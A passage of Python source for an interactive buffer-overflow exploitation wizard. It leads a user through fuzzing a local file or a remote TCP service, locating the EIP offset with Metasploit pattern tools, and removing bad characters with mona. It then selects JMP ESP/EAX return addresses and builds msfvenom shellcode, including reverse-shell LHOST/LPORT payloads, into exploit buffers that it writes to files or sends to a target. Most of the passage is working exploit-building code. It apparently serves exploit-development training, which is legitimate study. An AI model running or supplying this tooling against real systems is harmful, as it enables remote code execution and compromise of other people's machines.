nop_sled = 16
nop_padding = 16
return_address = struct.pack('<L', 0x12345678)
# Payload
arch = 'x86'
platform = 'windows'
payload = 'windows/messagebox'
connect_ip = '127.0.0.1'
connect_port = 4444
payload_code = b''
char_string = b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
char_string += b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
char_string += b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
char_string += b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
char_string += b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
char_string += b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
char_string += b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
char_string += b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
char_string += b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
char_string += b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
char_string += b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
char_string += b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
char_string += b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
char_string += b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
char_string += b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
char_string += b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
# -----------------------------------------------------------------------------
# Buffer types
# -----------------------------------------------------------------------------
class GenericBuffer:
"""
Basic Buffer sending an A-B-C payload, e.g for testing offsets
"""
def __init__(self):
self.id = 0
self.name = 'generic'
self.selectable = True
self.description = 'Simple A-B-C buffer'
self.select_text = 'None of these'
self.payload_size = buf_length - offset - 4 - len(start_command) - len(end_command)
self.buffer = b''
def get_buffer(self):
self.buffer = start_command
self.buffer += b"A" * offset # Overflow
self.buffer += b"B" * 4 # EIP content
self.buffer += b"C" * (buf_length - len(self.buffer) - len(end_command))
self.buffer += end_command
return self.buffer
def get_input(self):
print_error('Sorry! In this case, the wizard cannot build the right buffer automatically. '
'Please use the raw exploit file and modify it manually according your needs.')
def print_buffer(self):
return """
buffer = {start}
buffer += b'A' * offset
buffer += b'B' * 4
buffer += b'C' * (buf_length - len(buffer) - len({end}))
buffer += {end}
""".format(start=start_command,
end=end_command)
class ESPBuffer:
"""
Buffer which contains the payload after the return address. A JMP ESP command should be used as return address.
"""
def __init__(self):
self.id = 1
self.name = 'esp'
self.selectable = True
self.description = 'Buffer with payload in stack and JMP ESP'
self.select_text = 'The Top of Stack and following memory has been overwritten with Cs (ESP points to Cs)'
self.payload_size = buf_length - len(start_command) - offset - 4 - nop_sled - len(end_command)
self.buffer = b''
def get_buffer(self):
self.buffer = start_command
self.buffer += b"A" * offset
self.buffer += return_address
self.buffer += b'\x90' * nop_sled
self.buffer += payload_code
self.buffer += b"C" * (buf_length - len(self.buffer) - len(end_command))
self.buffer += end_command
if len(self.buffer) > buf_length:
print_warning('The buffer with payload is larger than the originally defined buffer length.\n'
'Check whether the exploit still runs properly.')
return self.buffer
def get_input(self):
print_info('Use the debugger to search for a JMP ESP address (e.g. Immunity Debugger: !mona jmp -r ESP)')
print_warning('Take care that the address does not contain a bad characters (such as 00)')
show_prompt_text('Enter a JMP ESP address:')
user_input = get_input(address_valid)
global return_address
return_address = struct.pack('<L', int(user_input, 16))
def print_buffer(self):
return """
buffer = {start}
buffer += b'A' * offset
buffer += b'{retr}' # Return address
buffer += b'{nop_char}' * {nop} # NOP sled
buffer += b'{payload}'
buffer += b'C' * (buf_length - len(buffer) - len({end})) # Padding
buffer += {end}
""".format(start=start_command,
retr=hex_to_print(return_address),
nop_char=hex_to_print(b'\x90'),
nop=nop_sled,
payload=hex_to_print(payload_code),
end=end_command)
class EAXBuffer:
"""
Buffer which contains the payload before the return address. Should be used if EAX points to first part of buffer.
A JMP EAX command should be used as payload.
"""
def __init__(self):
self.id = 2
self.name = 'eax'
self.selectable = True
self.description = 'Buffer with payload in EAX and JMP EAX'
self.select_text = 'The Top of Stack has not been overwritten; EAX points to As'
self.payload_size = offset - nop_sled - nop_padding
self.buffer = b''
def get_buffer(self):
self.buffer = start_command
self.buffer += b'\x90' * nop_sled
self.buffer += payload_code
self.buffer += b'\x90' * (offset - len(self.buffer))
self.buffer += return_address
self.buffer += b"C" * (buf_length - len(self.buffer) - len(end_command))
self.buffer += end_command
if len(self.buffer) > buf_length:
print_warning('The buffer with payload is larger than the originally defined buffer length. '
'Check whether the exploit still runs properly.')
return self.buffer
def get_input(self):
print_info('Use the debugger to search for a JMP EAX address (e.g. Immunity Debugger: !mona jmp -r EAX)')
print_warning('Take care that the address does not contain a bad characters (such as 00)')
show_prompt_text('Enter a JMP EAX address:')
user_input = get_input(address_valid)
global return_address
return_address = struct.pack('<L', int(user_input, 16))
def print_buffer(self):
return """
buffer = {start}
buffer += b'{nop_char}' * {nop} # NOP
buffer += b'{payload}'
buffer += b'{nop_char}' * (offset - len(buffer)) # Padding
buffer += b'{retr}' # Return address
buffer += b'C' * (buf_length - len(buffer) - len({end}))
buffer += {end}
""".format(start=start_command,
nop_char=hex_to_print(b'\x90'),
nop=nop_sled,
payload=hex_to_print(payload_code),
retr=hex_to_print(return_address),
end=end_command)
class FixedAddressBuffer:
"""
Buffer which contains the payload before the return address. Expects a fixed address which points to payload.
"""
def __init__(self):
self.id = 3
self.name = 'fixed'
self.selectable = True
self.description = 'Buffer with payload before EIP and pointer to fixed address'
self.select_text = 'The Top of Stack has not been overwritten but contains a fixed address which points to As'
self.payload_size = offset - nop_sled - nop_padding
self.buffer = b''
def get_buffer(self):
self.buffer = start_command
self.buffer += b'\x90' * nop_sled
self.buffer += payload_code
self.buffer += b'\x90' * (offset - len(self.buffer))
self.buffer += return_address
self.buffer += b"C" * (buf_length - len(self.buffer) - len(end_command))
self.buffer += end_command
if len(self.buffer) > buf_length:
print_warning('The buffer with payload is larger than the originally defined buffer length. '
'Check whether the exploit still runs properly.')
return self.buffer
def get_input(self):
show_prompt_text('Enter the address shown in the Top of Stack:')
user_input = get_input(address_valid)
global return_address
return_address = struct.pack('<L', int(user_input, 16))
def print_buffer(self):
return """
buffer = {start}
buffer += b'{nop_char}' * {nop} # NOP
buffer += b'{payload}'
buffer += b'{nop_char}' * (offset - len(buffer)) # Padding
buffer += b'{retr}' # Return address
buffer += b'C' * (buf_length - len(buffer) - len({end}))
buffer += {end}
""".format(start=start_command,
nop_char=hex_to_print(b'\x90'),
nop=nop_sled,
payload=hex_to_print(payload_code),
retr=hex_to_print(return_address),
end=end_command)
class PatternBuffer:
"""
Buffer which contains a unique pattern for determining the offset
"""
def __init__(self):
self.id = 4
self.name = 'pattern'
self.selectable = False
self.description = 'Buffer with pattern'
self.buffer = b''
self.pattern = b''
def get_buffer(self, pattern):
self.pattern = pattern
self.buffer = start_command
self.buffer += pattern
self.buffer += end_command
return self.buffer
def print_buffer(self):
return """
buffer = {start}
buffer += {pattern}
buffer += {end}
""".format(start=start_command,
pattern=self.pattern,
end=end_command)
class BadCharCBuffer:
"""
Buffer which contains all ASCII characters after the return address
"""
def __init__(self):
self.id = 5
self.name = 'badcharc'
self.selectable = False
self.description = 'Buffer with bad chars after EIP (in Cs)'
self.select_text = 'Enough space in stack for payload'
self.buffer = b''
def get_buffer(self):
self.buffer = start_command
self.buffer += b"A" * offset
self.buffer += b"B" * 4
self.buffer += char_string
self.buffer += b"C" * (buf_length - len(self.buffer) - len(end_command))
self.buffer += end_command
if len(self.buffer) > buf_length:
print_warning('The buffer with all ascii characters is larger than the originally defined buffer length. '
'Check whether the exploit still runs properly.')
return self.buffer
def print_buffer(self):
return """
buffer = {start}
buffer += b'A' * offset
buffer += b'B' * 4
buffer += b'{chars}'
buffer += b'C' * (buf_length - len(buffer) - len({end}))
buffer += {end}
""".format(start=start_command,
chars=hex_to_print(char_string),
end=end_command)
class BadCharABuffer:
"""
Buffer which contains all ASCII characters before the return address
"""
def __init__(self):
self.id = 6
self.name = 'badchara'
self.selectable = False
self.description = 'Buffer with bad chars before EIP (in As)'
self.select_text = 'Not enough space in stack for payload'
self.buffer = b""
def get_buffer(self):
self.buffer = start_command
self.buffer += b"A" * nop_sled
self.buffer += char_string
self.buffer += b"A" * (offset - len(self.buffer))
self.buffer += b"B" * 4
self.buffer += b"C" * (buf_length - len(self.buffer) - len(end_command))
self.buffer += end_command
if len(self.buffer) > buf_length:
print_warning('The buffer with all ascii characters is greater than the originally defined buffer length. '
'Check whether the exploit still runs properly.')
return self.buffer
def print_buffer(self):
return """
buffer = {start}
buffer += b'A' * {nop}
buffer += b'{chars}'
buffer += b'A' * (offset - len(buffer))
buffer += b'B' * 4
buffer += b'C' * (buf_length - len(buffer) - len({end}))
buffer += {end}
""".format(start=start_command,
nop=nop_sled,
chars=hex_to_print(char_string),
end=end_command)
class BufferTypes:
"""
Handles all available buffer types
"""
def __init__(self):
self.buf_types = [
GenericBuffer(),
ESPBuffer(),
EAXBuffer(),
FixedAddressBuffer(),
PatternBuffer(),
BadCharCBuffer(),
BadCharABuffer()
]
self.selected_buffer = None
def get_buffer_by_name(self, name):
for buf in self.buf_types:
if name == buf.name:
self.selected_buffer = buf
return buf
def get_buffer_by_id(self, buf_id):
for buf in self.buf_types:
if buf_id == buf.id:
self.selected_buffer = buf
return buf
def get_selectable_buffers(self):
selectable = list()
for buf in self.buf_types:
if buf.selectable:
selectable.append(buf)
return selectable
def hex_to_print(hex_string):
if len(hex_string) == 0:
return ""
return "\\x" + "\\x".join(a + b for a, b in zip(hex_string.hex()[::2], hex_string.hex()[1::2]))
# Init buffer list
buffer_list = BufferTypes()
# -----------------------------------------------------------------------------
# Descriptions of all parameters
# -----------------------------------------------------------------------------
# Returns lists with: parameter name, value, required, description
def desc_bo_type():
return ['type', bo_type, 'yes',
'Type of buffer overflow: local or remote']
def desc_step():
return ['step', current_step, 'yes',
'Currently selected wizard step']
def desc_file():
global file
file = file_name + '.' + file_ext if file_ext else file_name
return ['file', file, 'yes',
'File name; to change set the filename and file_ext parameters']
def desc_file_name():
return ['filename', file_name, 'yes' if bo_type is 'local' else 'no',
'Name of exploit file']
def desc_file_ext():
return ['fileext', file_ext, 'yes' if bo_type is 'local' else 'no',
'Extension of exploit file']
def desc_target():
return ['target', target, 'yes' if bo_type is 'remote' else 'no',
'IP of target system']
def desc_port():
return ['port', port, 'yes' if bo_type is 'remote' else 'no',
'Port on which application runs of target system']
def desc_start_command():
return ['command', str(start_command), 'no',
'Command which needs to be placed before calling the payload. '
'Enter with: set command "command". For raw ASCII input use: set command b"command". '
'Leave empty if not required']
def desc_end_command():
return ['end_command', str(end_command), 'no',
'Command which needs to be placed after calling the payload. '
'Enter with: set end_command "command". For raw ASCII input use: set command b"command". '
'Leave empty if not required']
def desc_fuzz_buff_length():
return ['fuzz_length', fuzz_buff_length, 'yes',
'How many payloads with increasing length will be created for fuzzing']
def desc_increase_step():
return ['fuzz_increase', increase_step, 'yes',
'How much the payload will be increased on each step']
def desc_fuzz_char():
return ['fuzz_char', fuzz_char.decode(), 'yes',
'Which character will be used for fuzzing the buffer']
def desc_pattern():
return ['pattern', pattern_length, 'yes',
'Length of alphanumeric pattern which will be generated.']
def desc_buf_length():
return ['buffer_length', buf_length, 'yes',
'Total length of buffer']
def desc_offset():
return ['offset', offset, 'yes',
'Offset for EIP overwrite']
def desc_badchars():
return ['badchars', ', '.join(c for c in badchars), 'yes',
'Which characters are not allowed in the buffer']
def desc_nop_sled():
return ['nop_sled', nop_sled, 'yes',
'Size of NOP sled before payload']
def desc_nop_padding():
return ['nop_padding', nop_padding, 'yes',
'Size of NOP padding after payload']
def desc_return_address():
return ['return', format(struct.unpack('<L', return_address)[0], 'x'), 'yes',
'Memory address to return to (e.g. JMP ESP address)']
def desc_arch():
return ['arch', arch, 'yes',
'Architecture of target system: 86 or 64']
def desc_platform():
return ['platform', platform, 'yes',
'Operating system or platform of target']
def desc_payload():
return ['payload', payload, 'yes',
'Type of payload. See msfvenom for possible options: msfvenom -l payloads']
def desc_connect_ip():
return ['lhost', connect_ip, 'yes' if bo_type is 'remote' else 'no',
'IP to connect to, e.g. with reverse shell']
def desc_connect_port():
return ['lport', connect_port, 'yes' if bo_type is 'remote' else 'no',
'Port to connect to, e.g. with reverse shell']
# -----------------------------------------------------------------------------
# Start
# -----------------------------------------------------------------------------
def check_dependencies():
"""
Checks if all required binaries are available
:return: (boolean) True if all dependencies fulfilled
"""
dependencies = ['msf-pattern_create', 'msf-pattern_offset', 'msfvenom']
deps_ok = True
for dep in dependencies:
try:
sub.call(dep, stdout=sub.DEVNULL, stderr=sub.DEVNULL)
except OSError:
deps_ok = False
print_error('Missing binary: {}'.format(dep))
if not deps_ok:
print_info('You need to install the Metasploit Framework')
return deps_ok
def print_welcome():
"""
Prints a welcome message to the screen
"""
print('''{}
╔═╗┬┌┬┐┌─┐┬ ┌─┐
╚═╗││││├─┘│ ├┤
╚═╝┴┴ ┴┴ ┴─┘└─┘
▄▄▄▄ ▒█████
▓█████▄ ▒██▒ ██▒
▒██▒ ▄██▒██░ ██▒
▒██░█▀ ▒██ ██░
░▓█ ▀█▓░ ████▓▒░
░▒▓███▀▒░ ▒░▒░▒░
▒░▒ ░ ░ ▒ ▒░
░ ░ ░ ░ ░ ▒ *
░ ░ ░ *°
*°`
╦ ╦┬┌─┐┌─┐┬─┐┌┬┐ *°``
║║║│┌─┘├─┤├┬┘ ││ (´***°``)
╚╩╝┴└─┘┴ ┴┴└──┴┘ ```*´´´
This wizards helps you getting
started with simple buffer overflows.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~{}
'''.format(CYAN, FORMAT_END))
def select_bo_type():
"""
Prints the buffer overflow types to the screen and stores the users selection
"""
show_prompt_text('Select type of buffer overflow:')
show_prompt_text('[ L ] Local buffer overflow', False)
show_prompt_text(' {} = Open a malicious file in an application {}'.format(GRAY, FORMAT_END), False)
show_prompt_text('[ R ] Remote buffer overflow', False)
show_prompt_text(' {} = Send a malicious request via TCP to an application {}'.format(GRAY, FORMAT_END), False)
user_input = get_input(bo_type_valid)
global bo_type
bo_type = 'local' if user_input in ['l', 'loc', 'local'] else 'remote'
# -----------------------------------------------------------------------------
# Steps
# -----------------------------------------------------------------------------
def start_steps():
"""Starts the wizard steps, beginning with fuzzing"""
step_fuzzing()
def step_fuzzing():
"""
We will increasing payloads and send them to the application to find out at which length a buffer overflow occurs
"""
global current_step
current_step = 0
show_step_banner('[0] Fuzzing')
if bo_type == 'local':
# File extension
show_prompt_text('Enter file extension:')
user_input = get_input(ext_valid)
global file_ext
global file
file_ext = user_input
file = file_name + '.' + file_ext if file_ext else file_name
print('\n{} files with increasing size will be generated. The following settings will be used:\n'.format(
fuzz_buff_length))
settings = [desc_file_ext(), desc_fuzz_buff_length(), desc_fuzz_char(), desc_increase_step(),
desc_start_command(), desc_end_command()]
elif bo_type == 'remote':
# Target IP
show_prompt_text('Enter target IP:')
user_input = get_input(ip_valid)
global target
target = user_input
# Target port
show_prompt_text('Enter target port:')
user_input = get_input(port_valid)
global port
port = int(user_input)
print('\nA fuzzing file will be generated. The following settings will be used:\n')
settings = [desc_target(), desc_port(), desc_fuzz_buff_length(), desc_fuzz_char(),
desc_increase_step(), desc_start_command(), desc_end_command()]
# Optional: file name, buffer length, increase, start command
show_settings(settings)
if proceed_ok():
if bo_type == 'local':
dump_local_fuzz()
elif bo_type == 'remote':
dump_remote_fuzz()
run_remote_fuzzing()
# Proceed
step_pattern()
def step_pattern():
"""
Based on the buffer length determined through fuzzing (previous step), we will create and send
a unique pattern which will help us finding the offset
"""
global current_step
current_step = 1
show_step_banner('[1] Finding offset')
# Get length from fuzzing
show_prompt_text('Enter the length at which the application/service crashed:')
user_input = get_input(number_valid)
global pattern_length
pattern_length = int(user_input) - len(start_command) - len(end_command)
global buf_length
buf_length = int(user_input)
# Call Metasploit framework
tmp_file = 'pattern.txt'
command = 'msf-pattern_create -l {} > {}'.format(pattern_length, tmp_file)
thread = call_command(command)
while thread.running():
animation('Creating pattern')
# Proceed if pattern creation was successful
if thread.result() == 0:
print()
# Buffer ----------------------------------
with open(tmp_file, 'r') as f:
pattern = f.read().splitlines()[0].encode()
global buffer
buffer = buffer_list.get_buffer_by_name('pattern').get_buffer(pattern)
# -----------------------------------------
os.unlink(tmp_file)
print('The exploit file will be generated. The following settings will be used:\n')
if bo_type == 'local':
settings = [desc_pattern(), desc_start_command(), desc_end_command()]
show_settings(settings)
if proceed_ok():
dump_local_exploit()
print(' Load file into vulnerable application and check which pattern is shown in EIP on crash.')
elif bo_type == 'remote':
settings = [desc_target(), desc_port(), desc_pattern(), desc_start_command(), desc_end_command()]
show_settings(settings)
if proceed_ok():
dump_remote_exploit()
run_remote_exploit()
# Proceed
step_offsets()
def step_offsets():
"""
In the offset step, the user enters the value that overwrites EIP.
By comparing this value to the pattern (previous step), the offset can be determined.
We will then build a custom payload that places Bs in the EIP.
The user must then check in the debugger whether the offset has been calculated properly.
"""
global current_step
current_step = 2
show_step_banner('[2] Checking offsets')
# Get EIP offset from pattern -----------------------------------------------
show_prompt_text('Enter the 8 characters that are shown in the EIP:')
user_input = get_input(pattern_valid)
# Call Metasploit framework
tmp_file = 'offset.txt'
command = 'msf-pattern_offset -q {} > {}'.format(shlex.quote(user_input), tmp_file)
thread = call_command(command)
while thread.running():
animation('Finding offset')
# Proceed if finding offset was successful
if thread.result() == 0:
print()
with open(tmp_file, 'r') as f:
result = f.read()
try:
global offset
offset = int(result.split(' ')[-1])
print_info('Offset at ' + str(offset))
except (ValueError, IndexError):
print_error('Could not find string in pattern. Maybe the exploit did not work?')
print_info('You could return to step [1] and try increasing the length.')
os.unlink(tmp_file)
valid_step = False
while not valid_step:
show_prompt_text('With which step do you want to proceed?')
user_input = get_input(number_valid)
if set_step(user_input):
valid_step = True
os.unlink(tmp_file)
# Get stack (ESP) offset from pattern ---------------------------------------
show_prompt_text('Enter the 8 characters that are shown at the top of stack:')
user_input = get_input(pattern_valid)
# Call Metasploit framework
tmp_file = 'offset.txt'
command = 'msf-pattern_offset -q {} > {}'.format(shlex.quote(user_input), tmp_file)
thread = call_command(command)
while thread.running():
animation('Finding offset')
# Proceed if finding offset was successful
if thread.result() == 0:
print()
with open(tmp_file, 'r') as f:
result = f.read()
try:
stack_offset = int(result.split(' ')[-1])
print_info('Offset at ' + str(stack_offset))
global nop_sled
off_stack_dist = stack_offset - offset
if off_stack_dist > nop_sled:
nop_sled = off_stack_dist
except (ValueError, IndexError):
print_info('Could not find string in pattern. '
'Seems that the overflow did not overwrite the stack. We will deal with that later.')
os.unlink(tmp_file)
# Create check file ---------------------------------------
global buffer
buffer = buffer_list.get_buffer_by_name('generic').get_buffer()
if bo_type == 'local':
dump_local_exploit()
elif bo_type == 'remote':
update_remote_exploit()
run_remote_exploit()
print(
' Does the EIP show 42424242? If not, something is wrong with the offset and you should repeat the previous steps.')
print_info('Write the address down where the Cs start. You can use it later to find bad characters with mona.')
# Proceed
if proceed_ok():
step_badchars()
def step_badchars():
"""
In the badchar step an ASCII string is repeatedly passed as payload.
The user has to examine the result in a debugger and enter the characters that break the exploit.
These characters are stored and will be considered later when creating the real payload.
"""
global current_step
current_step = 3
show_step_banner('[3] Finding bad characters')
print_info('You must probably repeat this step multiple times until you have found all bad characters.')
# Mona info
print('''{}
In Immunity Debugger, you can use mona to find the bad characters. To do so, do the following before running the exploit:
1. Set up working directory: !mona config -set workingfolder c:\\mona\\%p
2. Create byte array: !mona bytearray
{}'''.format(GRAY, FORMAT_END))
all_chars_found = False
while not all_chars_found:
global buffer
buffer = buffer_list.get_buffer_by_name('badcharc').get_buffer()
if bo_type == 'local':
dump_local_exploit()
elif bo_type == 'remote':
update_remote_exploit()
run_remote_exploit()
print('\n Can you see all Cs when following ESP or EAX in dump (depending on where the Cs are stored)?')
print('''{}
In Immunity Debugger, you can use mona to find the bad characters.
To do so, do the following before resending the exploit:
1. Compare: !mona compare -f c:\\mona\\<app name>\\bytearray.bin -a <address where Cs should start>
2. Recreate byte array: !mona bytearray -cpb "{}<new_bad_char>"
{}'''.format(GRAY, '\\x' + '\\x'.join(c for c in badchars), FORMAT_END))
show_prompt_text('Enter the character (e.g. 00, 0a, 0d) which does not show up or breaks the exploit')
show_prompt_text('To show all possible ascii characters enter {}show ascii{}'.format(BOLD, FORMAT_END))
show_prompt_text('Leave empty / press Enter when there a no more bad characters.')
user_input = get_input(bad_char_valid)
if user_input == '':
all_chars_found = True
else:
# Remove from badchar string
char = unhexlify(user_input)
global char_string
char_string = char_string.replace(char, b'')
# Append to list of bad chars
badchars.append(user_input)
# Proceed
step_return()
def step_return():
"""
By examining the buffer overflow, we can determine where to put the payload and which command to use to access it
"""
global current_step
current_step = 4
show_step_banner('[4] Finding return address')
show_prompt_text('Examine the buffer overflow in the debugger. Which case does apply?')
buf_types = buffer_list.get_selectable_buffers()
for b in buf_types:
show_prompt_text('[ ' + str(b.id) + ' ] ' + b.select_text, False)
# Wait for user selection
while True:
user_input = int(get_input(number_valid))
if 0 <= user_input < len(buf_types):
break
print_warning('The number you entered is invalid')
# Handle selected buffer type
selected = buffer_list.get_buffer_by_id(user_input)
selected.get_input()
global buffer
buffer = selected.get_buffer()
if bo_type == 'local':
dump_local_exploit()
elif bo_type == 'remote':
update_remote_exploit()
run_remote_exploit()
# Proceed
print(' Check if everything is where it should be. If not, repeat previous steps.')
if proceed_ok():
step_payload()
def step_payload():
"""
We define the type of payload we wish to send and create the final exploit file.
"""
global current_step
current_step = 5
show_step_banner('[5] Creating payload')
# Set IP -----------------
global connect_ip
show_prompt_text('Enter your IP (hit Enter to use current value {}):'.format(connect_ip))
user_input = get_input(ip_valid)
if user_input != '':
connect_ip = user_input
# Set port -----------------
global connect_port
show_prompt_text('Enter the port to listen on (hit Enter to use current value {}):'.format(connect_port))
user_input = get_input(port_valid)
if user_input != '':
connect_port = user_input
# Set architecture -----------------
global arch
show_prompt_text('Enter the target architecture (hit Enter to use current value {}):'.format(arch))
user_input = get_input(arch_valid)
if user_input != '':
arch = 'x' + user_input
# Set platform -----------------
global platform
show_prompt_text('Enter the target platform (hit Enter to use current value {}):'.format(platform))
user_input = get_input(platform_valid)
if user_input != '':
platform = user_input
# Set payload -----------------
global payload
while True:
show_prompt_text('Enter payload type'.format(payload))
show_prompt_text('Show all available with {}show payloads{}'.format(BOLD, FORMAT_END))
user_input = get_input(payload_valid)
if user_input == 'show payloads':
show_payloads()
continue
else:
# Create payload -----------------
payload = user_input
payload_ok = create_payload()
if payload_ok and bo_type == 'local':
dump_local_exploit()
elif payload_ok and bo_type == 'remote':
update_remote_exploit()
run_remote_exploit()
show_prompt_text('Did your exploit work? If not, try sending a different payload.')
show_prompt_text(
'Enter {}again{} to try again. Hit Enter if everything worked fine.'.format(BOLD, FORMAT_END))
user_input = get_input(check_text)
if user_input == '':
break
else:
continue
# Finally show prompt till user exits
get_input(generic_check)
def create_payload():
"""Creates a palyoad with msfvenom and updates the buffer"""
tmp_file = 'payload.py'
payload_size = buffer_list.selected_buffer.payload_size
command = "msfvenom -a {arch} --platform {plat} -p {pay} LHOST={host} LPORT={port} EXITFUNC=thread -s {size} -b '{bad}' -f py -v payld -o {file}".format(
arch=shlex.quote(arch),
plat=shlex.quote(platform),
pay=shlex.quote(payload),
host=connect_ip,
port=connect_port,
size=payload_size,
bad='\\x' + '\\x'.join(str(char) for char in badchars),
file=tmp_file)
print_info("Executing command: " + command)
thread = call_command(command)
while thread.running():
animation('Creating payload')
# Proceed if finding offset was successful
if thread.result() == 0:
print()
from payload import payld
global payload_code
payload_code = payld
# Remove temporary file and folder
# os.unlink(tmp_file)
shutil.rmtree('__pycache__', ignore_errors=True)
# Update buffer with payload
global buffer
buffer = buffer_list.selected_buffer.get_buffer()
print_info('Buffer has been updated with new payload')
if len(payload_code) > payload_size:
print_warning(
"The payload was generated as small as possible. However, it is larger than the specified payload size.\n"
"The exploit probably still works fine, but don't be surprised if problems occur.")
return True
else:
print('\n')
print_warning('Something went wrong when creating the payload. Check if you have entered a valid payload.')
print_info('To create a new payload use {}set payload <value>{}'.format(BOLD, FORMAT_END))
return False
# -----------------------------------------------------------------------------
# Input check functions
# -----------------------------------------------------------------------------
# Checks whether the user input is valid in the given context
# Returns True if input is valid
# -----------------------------------------------------------------------------
def intro_valid(user_input):
if user_input == 'start':
return True
return False
def bo_type_valid(user_input):
"""Accepts certain string variants for local / remote"""
if user_input in ['l', 'r', 'loc', 'rem', 'local', 'remote']:
return True
print_error("Invalid buffer overflow type. Only 'local' or 'remote' are possible.")
return False
def ext_valid(user_input):
"""Accepts a string with a maximum length of 20 as file extension"""
if user_input.startswith('.') or len(user_input) > 20 or ' ' in user_input:
return False
print_error("Invalid input. Enter the extension without preceding dot. Maximum length is 20.")
return True
def ip_valid(user_input):
"""Accepts a string with a valid IP address"""
if user_input == '':
return True
ip_regex = re.compile(
r'^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$')
return re.match(ip_regex, user_input)
def port_valid(user_input):
"""Accepts an integer within the number range for ports"""
if user_input == '':
return True
try:
port_no = int(user_input)
if 0 <= port_no <= 65535:
return True
else:
print_error("Invalid port number.")
return False
except ValueError:
print_error("Invalid port number.")
return False
def check_enter(user_input):
"""Accepts no input (= Enter) and skip"""
if user_input in ['', 'skip']:
return True
return False
def number_valid(user_input):
"""Accepts any integer"""
try:
number = int(user_input)
return True
except ValueError:
print_error("Invalid number.")
return False
def pattern_valid(user_input):
"""The Metasploit pattern is alphanumeric, so the EIP value as well"""
if len(user_input) == 8 and user_input.isalnum():
return True
print_error("Invalid pattern. The pattern mus be an 8-bit hex value.")
return False
def bad_char_valid(user_input):
"""Accepts an alphanumeric value of length 2 or no input (= Enter)"""
if user_input == '':
return True
if len(user_input) == 2 and user_input.isalnum():
try:
int(user_input, 16)
return True
except ValueError:
return False
print_error("Invalid character. Enter the hex value: 00 0a etc.")
return False
def address_valid(user_input):
"""Accepts a memory location: 8-bit hex value"""
if len(user_input) == 8:
try:
int(user_input, 16)
return True
except ValueError:
return False
print_error("Invalid memory address. Must be an 3-bit hex value.")
return False
def payload_valid(user_input):
"""Accepts a string matching the basic format 'platform/payload'"""
if len(user_input.split('/')) >= 2 or user_input == 'show payloads' or user_input == '':
return True
print_error("Invalid payload. Use 'show payloads' to show valid payloads.")
return False
def arch_valid(user_input):
if user_input in ['64', '86', '']:
return True
print_error("Invalid atchitecture. Enter 64 or 86.")
return False
def platform_valid(user_input):
"""Msfvenom platforms are words with a maximum length of 10"""
if (len(user_input) <= 10 and user_input.isalpha()) or user_input == '':
return True
print_error("Invalid platform type")
return False
def check_text(user_input):
"""Accepts any string without numbers or special characters"""
if user_input.isalpha() or user_input == '':
return True
print_error("Invalid input")
return False
def generic_check(user_input):
"""Always returns False so that the user prompt is shown until exit is entered"""
return False
# -----------------------------------------------------------------------------
# Input handling
# -----------------------------------------------------------------------------
def get_input(check_function):
"""
Shows a prompt as long as the user has not entered valid input. A check function checks if the user input is valid.
:param check_function: (function) Checks if input is valid
:return: (string) User input in lower case
"""
input_ok = False
user_input = ''
while not input_ok:
user_input = input(show_prompt())
# Print empty line after input
print()
# Handle specific user input
if user_input.lower() in ['exit', 'quit']:
exit(0)
elif user_input.lower() in ['help', 'show help']:
show_help()
continue
elif user_input.lower() == 'show options':
show_options()
continue
elif user_input.lower() == 'show steps':
show_steps()
continue
elif user_input.lower() == 'show payloads':
show_payloads()
continue
elif user_input.lower() == 'show ascii':
show_ascii()
continue
elif user_input.lower().startswith('set '):
set_option(user_input)
continue
elif user_input.lower() in ['dump', 'dump exploit', 'exploit']:
if bo_type == 'local':
dump_local_exploit()
if bo_type == 'remote':
dump_remote_exploit()
continue
# Check input
input_ok = check_function(user_input.lower())
if not input_ok:
# Show message only if user entered something invalid
if user_input != '':
print_error('Invalid input. Type help to show available commands.')
return user_input
def proceed_ok():
"""
Requires the user to hit enter to proceed
"""
show_prompt_text('Press Enter to proceed.')
if get_input(check_enter) == '':
return True
return False
def set_step(value):
"""
Opens the given step
:param value: (int) Step
"""
try:
number = int(value)
if 0 < number > 5:
raise ValueError
global current_step
current_step = number
steps = [step_fuzzing, step_pattern, step_offsets, step_badchars, step_return, step_payload]
steps[number]()
except ValueError:
print_error('Invalid input. You can only select step 0 to 5.')
return False
def set_command(user_input, command_type):
"""
Sets the start or end command to the value provided by the user
:param user_input: (string) Value the user entered
:param command_type: (string) Type of command: 'start' or 'end'
"""
global start_command
global end_command
global pattern_length
value = user_input.split(' ')[2:]
command = ' '.join(v for v in value)
# Handle binary input differently
if command.startswith('b"'):
command = command.lstrip('b"')
command = command.rstrip('"')
